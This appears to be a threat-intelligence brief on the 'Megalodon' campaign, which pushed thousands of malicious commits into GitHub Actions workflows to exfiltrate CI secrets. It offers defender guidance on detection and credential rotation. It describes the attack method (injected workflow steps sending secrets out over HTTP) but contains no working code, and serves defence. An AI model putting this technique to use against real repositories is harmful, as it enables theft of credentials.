Threats

Megalodon GitHub Attack Targets 5,561 Repos with Malicious CI/CD Workflows

Megalodon pushed 5,718 malicious GitHub commits in 6 hours, exposing CI secrets and cloud credentials at scale.

View on Graph

Overview

  • Megalodon pushed 5,718 malicious GitHub commits in 6 hours, exposing CI secrets and cloud credentials at scale.
  • The attackers targeted CI/CD workflow files, injecting malicious steps into GitHub Actions pipelines to exfiltrate repository secrets.
  • Affected repositories spanned the open-source ecosystem, with cloud provider credentials, API tokens, and signing keys exposed in leaked workflow output.
  • The campaign’s high throughput — nearly a thousand commits per hour — suggests automated tooling scanning for repos with writeable workflows and committing en masse before defensive take-downs activated.

Defender Takeaways

Monitor for anomalous commit velocity: Five thousand commits across thousands of repos in six hours means most of these looked identical. Alert on mass-push events where a single actor commits to multiple unrelated repos within a short window. GitHub’s audit log (repo.access, git.push) combined with actor identity clustering is the key detection signal.

Audit workflow file integrity: Track changes to .github/workflows/*.yml and .github/workflows/*.yaml as high-severity events. Attackers add or modify workflow steps to exfiltrate ${{ secrets.* }} values. Deploy CODEOWNERS or branch protection on workflows directory so unapproved workflow changes require review.

Scan for secret exposure in Action output: CI/CD secrets are dumped to runner logs and exfiltrated via HTTP requests embedded in workflow steps. Use GitHub secret scanning, third-party secret scanners, and centralize CI log retention with SIEM ingestion to detect outbound secret leakage.

Rotate credentials on breach signal: The initial signal of a workflow compromise should trigger automatic credential rotation for all secrets exposed to the affected repository. Manual rotation windows are measured in minutes — attackers execute the exfiltration step in the same job that runs the malicious commit.

Sources